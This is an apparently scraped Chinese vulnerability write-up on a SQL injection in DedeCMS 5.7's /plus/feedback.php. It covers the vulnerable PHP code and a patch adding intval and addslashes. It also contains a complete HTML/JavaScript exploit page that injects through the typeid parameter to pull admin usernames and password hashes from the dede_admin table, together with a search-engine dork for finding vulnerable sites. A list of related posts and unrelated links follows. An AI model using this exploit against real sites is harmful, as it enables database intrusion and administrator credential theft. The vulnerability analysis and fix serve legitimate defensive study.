catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

. Dedecms v5.7的plus\feedback.php SQL没有正确验证用户提供的输入,在实现上中存在注入漏洞

. 攻击者可以利用DEDECMS的变量覆盖漏洞向数据库中注入WEBSHELL Payload

. 在另一个代码流,攻击者可以触发二次注入

Relevant Link:

http://sebug.net/vuldb/ssvid-60549

http://www.venustech.com.cn/NewsInfo/124/17697.Html

http://www.sorry404.com/chengxuwenti/20140504/47.html

2. 漏洞触发条件

0x1: POC

<html>

<head>

<title>DedeCms v5. feedback.php exp</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<script language='javascript'>

y = document.form1.addr.value;

function exploit()

{

        var yanzhen = document.getElementById("yanzhen").value;

        var aid = document.getElementById("aid").value;

        var sqli = document.getElementById("sqli").value;

        document.form1.typeid.value = "0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'), ('" + aid +"','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',"+sqli+")#";

        document.form1.action = document.form1.addr.value + "/plus/feedback.php";

        document.form1.te.name = "action";

        document.form1.submit();

}

function getyanzhen()

{

        var x = "<img src='"+ document.form1.addr.value +"/include/vdimgck.php' width='60' height='24' onclick=\"this.src=this.src+'?'\">";

        document.body.innerHTML+=x;

        document.form1.addr.value = y;

}

function look()

{

        window.location.href = document.form1.addr.value+"/plus/feedback.php?aid="+document.getElementById("aid").value;

}

</script>

</head>

<body>

############################################################<br/>

DedeCms v5. feedback.php $typeid SQLi<br/>

Dork:inurl:plus/feedback.php?aid=<br/>

############################################################<br/><br/>

<form action="xxx" method="get" name="form1" target="_blank">

程序URL:<input type="text" id="addr" value="http://" /><br/>

验证码:<input type="text" name="validate" id="yanzhen" value=""/><br/>

存在的Aid:<input type="text" id="aid" value=""/><br/>

SQL注入语句:<input type="text" id="sqli" value="(SELECT concat(uname,0x5f,pwd,0x5f) FROM `dede_admin`)" style="width:500px;"/><br/>

<input type="hidden" name="" id="te" value="send"/>

<input type="hidden" name="comtype" value="comments"/>

<input type="hidden" name="fid" value=""/>

<input type="hidden" name="isconfirm" value="yes"/>

<input type="hidden" name="msg" value="90sec"/>

<input type="hidden" name="typeid" value=""/>

<input type="button" onclick="getyanzhen();" value="获取验证码">

<input type="button" onClick="exploit()" value="#Exploit#" />

<input type="button" onClick="look()" value="查看结果" /><br/>

</form>

</body>

</html>

Relevant Link:

http://www.oday.pw/WEBanquan/111312.html

3. 漏洞影响范围

<= dedecms 5.7

4. 漏洞代码分析

\plus\feedback.php

..

//保存评论内容

if($comtype == 'comments')

{

    $arctitle = addslashes($title);

    if($msg!='')

    {

        //$typeid变量未做初始化

        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)

           VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','','','$feedbacktype','$face','$msg'); ";

        $rs = $dsql->ExecuteNoneQuery($inquery);

        if(!$rs)

        {

            ShowMsg(' 发表评论错误! ', '-1');

            //echo $dsql->GetError();

            exit();

        }

    }

}

//引用回复

elseif ($comtype == 'reply')

{

    $row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");

    //未对数据库查询的$row['arctitle']进行有效过滤,造成二次注入

    $arctitle = $row['arctitle'];

    $aid =$row['aid'];

    $msg = $quotemsg.$msg;

    $msg = HtmlReplace($msg,);

    $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)

            VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','','','$feedbacktype','$face','$msg')";

    $dsql->ExecuteNoneQuery($inquery);

}

..

Relevant Link:

http://www.yunsec.net/a/security/web/jbst/2012/1103/11816.html

5. 防御方法

\plus\feedback.php

//保存评论内容

    if($comtype == 'comments')

    {

        $arctitle = addslashes($title);

        /* 增加规范化、过滤逻辑 */

        $typeid = intval($typeid);

        $ischeck = intval($ischeck);

        $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);

        /**/

        if($msg!='')

        {

            //$typeid变量未做初始化

            $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)

                   VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','','','$feedbacktype','$face','$msg'); ";

            $rs = $dsql->ExecuteNoneQuery($inquery);

            if(!$rs)

            {

                ShowMsg(' 发表评论错误! ', '-1');

                //echo $dsql->GetError();

                exit();

            }

        }

    }

    //引用回复

    elseif ($comtype == 'reply')

    {

        $row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");

        //未对数据库查询的$row['arctitle']进行有效过滤,造成二次注入

        $arctitle = $row['arctitle'];

        /* 增加转义逻辑 */

        $arctitle = addslashes($row['arctitle']);

        /* */

        $aid =$row['aid'];

        $msg = $quotemsg.$msg;

        $msg = HtmlReplace($msg,);

        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)

                VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','','','$feedbacktype','$face','$msg')";

        $dsql->ExecuteNoneQuery($inquery);

    }

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

dedecms /plus/feedback.php SQL Injection Vul的更多相关文章

  1. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

  2. dedecms /member/uploads_edit.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms 5.3版本下的member/uploads_edit.p ...

  3. dedecms /member/resetpassword.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 DEDEcms SQL注入漏洞导致可以修改任意用户密码 2. 漏洞触发条 ...

  4. dedecms /member/reg_new.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http://127 ...

  5. dedecms /member/pm.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  6. dedecms /member/myfriend_group.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  7. dedecms /member/flink_main.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 会员模块中存在的SQL注入 Relevant Link http://w ...

  8. dedecms /member/mtypes.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Dedecms会员中心注入漏洞 Relevant Link http:/ ...

  9. dedecms /member/edit_baseinfo.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 会员模块中存在的SQL注入 Relevant Link: http:// ...

随机推荐

  1. 一道int与二进制加减题

    int dis_data = 32769; if( dis_data > 0x7fff)  dis_data -= 0xffff; printf("%d\n",dis_dat ...

  2. 本地的html怎么直接通过路径就读取本地文件。

    我要做的事情是已知一个目录的相对路径,获得这个路径下面所有的txt文件,然后读到一个JS Script里面做下一步处理. 网上的例子都是使用input的,既然我是local的html文件,也知道路径了 ...

  3. PAT1078 Hashing

    11-散列2 Hashing   (25分) The task of this problem is simple: insert a sequence of distinct positive in ...

  4. 基于.NET Socket API 通信的综合应用

    闲谈一下,最近和客户进行对接Scoket 本地的程序作为请求方以及接受方,对接Scoket 的难度实在比较大,因为涉及到响应方返回的报文的不一致性,对于返回的报文的格式我需要做反序列化的难度增大了不少 ...

  5. .Net简单图片系统-本地存储和分布式存储

    本地存储 所谓本地存储就是将上传图片保存到图片服务器的本地磁盘上. if (ConfigHelper.GetConfigString("SaveMode") == "Lo ...

  6. 基于FPGA的音频信号的FIR滤波(Matlab+Modelsim验证)

    1 设计内容 本设计是基于FPGA的音频信号FIR低通滤波,根据要求,采用Matlab对WAV音频文件进行读取和添加噪声信号.FFT分析.FIR滤波处理,并分析滤波的效果.通过Matlab的分析验证滤 ...

  7. 准标识符(Quasi-dientifier, QI)

    Quasi-identifier From Wikipedia, the free encyclopedia Quasi-identifiers are pieces of information t ...

  8. 【JQuery】jQuery.inArray 确定第一个参数在数组中的位置

    函数:jQuery.inArray(value,array,[fromIndex]) 解释:         value:用于在数组中查找是否存在         array:待处理数组.       ...

  9. 【JavaEE企业应用实战学习记录】struts国际化

    <%-- Created by IntelliJ IDEA. User: Administrator Date: 2016/10/6 Time: 16:26 To change this tem ...

  10. 【JavaEE企业应用实战学习记录】servlet3.0上传文件

    <%-- Created by IntelliJ IDEA. User: Administrator Date: 2016/10/6 Time: 14:20 To change this tem ...